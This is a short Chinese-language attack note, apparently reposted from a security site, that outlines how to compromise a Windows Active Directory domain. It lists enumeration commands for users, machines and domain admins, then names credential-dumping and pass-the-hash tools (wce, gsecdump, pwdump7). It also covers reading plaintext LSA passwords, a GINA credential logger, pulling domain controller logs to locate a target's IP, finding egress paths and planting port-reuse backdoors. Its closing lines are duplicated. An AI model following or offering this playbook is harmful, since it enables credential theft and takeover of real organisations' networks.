域内渗透小记
一、获取域内信息
1、列出该域内所有机器名(dsquery computer domainroot -limit 65535 && net group "domain computers" /domain)
2、列出该域内所有用户名(dsquery user domainroot -limit 65535 && net user /domain)
3、列出该域内网段划分 (dsquery subnet)
4、列出该域内分组 (dsquery group && net group /domain)
5、列出该域内组织单位 (dsquery ou)
6、列出该域内域控制器 (dsquery server && net time /domain)
7、列出域管理员帐号 (net group "domain admins" /domain)
二、分析域内信息确定目标
通过上述收集到的信息,我们可以分析出很多重要信息例如:每个分组下面都有哪些用户、机器(net group 组名/domain && dsquery
"ou信息")文件服务器,邮件服务器以及目标所在位置等。
三、域内渗透
1、抓取hash破解密码(gsecdump、wce、pwdump7、gethash等)
2、hash 注入 (wce -s)
3、读取lsa明文密码 (wce1.3 -w 、gsecdump -a)
4、0day溢出(smb、rdp、dns、rpc 等)
5、安装gina 记录管理员帐号密码
6、hd 扫描弱口令等 www.2cto.com
通过以上方法获取域控制器权限
四、确定目标IP
1、确定目标用户登录日期(net user aa /domain)
2、导出该日期域控制器登录日志(cscript eventquery.vbs /fi "Datetime eq 06/25/2012,03:15:00AM/06/25/2012,03:15:00PM"
/l Security >c:\xxx.txt)
3、导出DHCP配置(netsh dhcp)
通过日志分析可确定目标IP,进一步精确打击。
1.外网监听一个端口,找内网服务器telnet出来,看出来的外网IP,然后再扫这个外网IP是否开放端口,没有就扫外网IP同段
2.一般扫外网IP 80 443 再扫内网IP 80 443 再telnet 外网ip 在内网服务器看有没有连接
3.一般常规的dmz区有对应内外网的80,再者大多数通道就是直接找邮件服务器是对应内网的。
当然端口复用后门得有,webshell过时了。
2.一般扫外网IP 80 443 再扫内网IP 80 443 再telnet 外网ip 在内网服务器看有没有连接
3.一般常规的dmz区有对应内外网的80,再者大多数通道就是直接找邮件服务器是对应内网的。
当然端口复用后门得有,webshell过时了。
